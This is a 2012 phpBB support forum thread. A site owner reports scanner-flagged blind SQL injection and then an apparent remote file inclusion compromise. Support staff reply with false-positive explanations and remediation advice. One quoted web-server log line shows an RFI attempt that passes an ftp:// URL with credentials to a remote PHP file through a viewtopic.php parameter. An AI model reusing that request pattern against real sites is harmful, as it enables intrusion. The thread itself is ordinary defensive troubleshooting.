Blind SQL Injection Exploits!

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Get Involved
myssbot
Registered User
Posts: 3
Joined: Wed Jun 27, 2012 9:38 am

Blind SQL Injection Exploits!

Postby myssbot » Wed Jun 27, 2012 9:51 am

Blind SQL Injection Exploits!

Affected items
/memberlist2.php
/viewtopic.php
/toplist.php

About toplist.php i just removed!

Any idea how to fix the vuln on memberslist2.php and viewtopic.php ?

Image

Image


The impact of this vulnerability
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

How to fix this vulnerability
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.

User avatar
RMcGirr83
Former Team Member
Posts: 16722
Joined: Wed Jun 22, 2005 4:33 pm
Location: Connecticut USA
Name: Rich McGirr
Contact:

Re: Blind SQL Injection Exploits!

Postby RMcGirr83 » Wed Jun 27, 2012 10:01 am

There are no such files of memberslist2.php nor toplist.php within a default download of the phpBB software. As for viewtopic.php more than likely someone edited the file and included a sql injection within the code.
Image

Do not hire Christian Bullock

User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 9920
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: Blind SQL Injection Exploits!

Postby Noxwizard » Wed Jun 27, 2012 6:35 pm

You should take these results with a grain of salt. Automated tools like this generally report back a lot of bogus results. If you look at the viewtopic result, it actually gave back a 404 status code, which is the correct behavior when a topic can't be found. So for correct behavior, it reports a SQL injection vulnerability? If you keep phpBB and your MODs up-to-date, you should be fine.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Hosting Services - The Business Helpdesk.com, Inc.
Do not contact me for private support, please share the question in our forums.

myssbot
Registered User
Posts: 3
Joined: Wed Jun 27, 2012 9:38 am

Re: Blind SQL Injection Exploits!

Postby myssbot » Thu Jun 28, 2012 12:15 am

The website was hacked by RFI exploits and the guy changed many things on .htaccess, i think was by the toplist.php because after removed the topilist.php and fixed .htaccess it stops

anyway thanks for the support, the problem was mod sux, i dont know how its works but should be good a look into the code before aprove it to download(if it not happens already)

thanks m8

User avatar
AmigoJack
Registered User
Posts: 4162
Joined: Tue Jun 15, 2010 11:33 am
Location: グリーン ヒル ゾーン
Contact:

Re: Blind SQL Injection Exploits!

Postby AmigoJack » Thu Jun 28, 2012 5:30 am

myssbot wrote:the problem was mod sux
Link to it.
The worst thing about censorship is ███████████

myssbot
Registered User
Posts: 3
Joined: Wed Jun 27, 2012 9:38 am

Re: Blind SQL Injection Exploits!

Postby myssbot » Thu Jun 28, 2012 6:28 am

I still have problems...

He is saving files .js on my ftp forum files and editing some files..

this is my webhost log:

Code: Select all

177.98.185.243 - - [26/Jun/2012:22:00:27 -0300] "GET /viewtopic.php?f=ftp://hhklkj:2600144@ftp.freehostia.com/tester.php? HTTP/1.0" 404 9713 "-" "Mozilla/3.0 (compatible; Indy Library)" "-" 262 9949


Any1 know how i can stop it?

User avatar
Erik Frèrejean
Former Team Member
Posts: 9897
Joined: Tue Oct 09, 2007 9:09 am
Location: The Netherlands, 3.0.x Support Forum
Name: Erik Frèrejean
Contact:

Re: Blind SQL Injection Exploits!

Postby Erik Frèrejean » Thu Jun 28, 2012 10:16 am

Change the FTP password, change the passwords of you admin accounts and contact your host. phpBB is just showing the issue, it is most likely not the point of entry.
Support Toolkit | Support Request Template | Knowledge Base | phpBB 3.0.x documentation
I don't give support via PM or IM! (all unsolicited pms will be trashed!)

CaNNon_
Registered User
Posts: 392
Joined: Wed Apr 29, 2009 2:07 am

Re: Blind SQL Injection Exploits!

Postby CaNNon_ » Thu Jun 28, 2012 11:34 am

HTTP/1.0" 404


I don't think that log entry means much, 404 = not found. If you want to use the appache logs you need to look for stuff that got a reply.


Return to “3.0.x Support Forum”

Who is online

Users browsing this forum: AcidRain2012, axispowerheavy, Bing [Bot], Oyabun1, spankym, stevemaury and 124 guests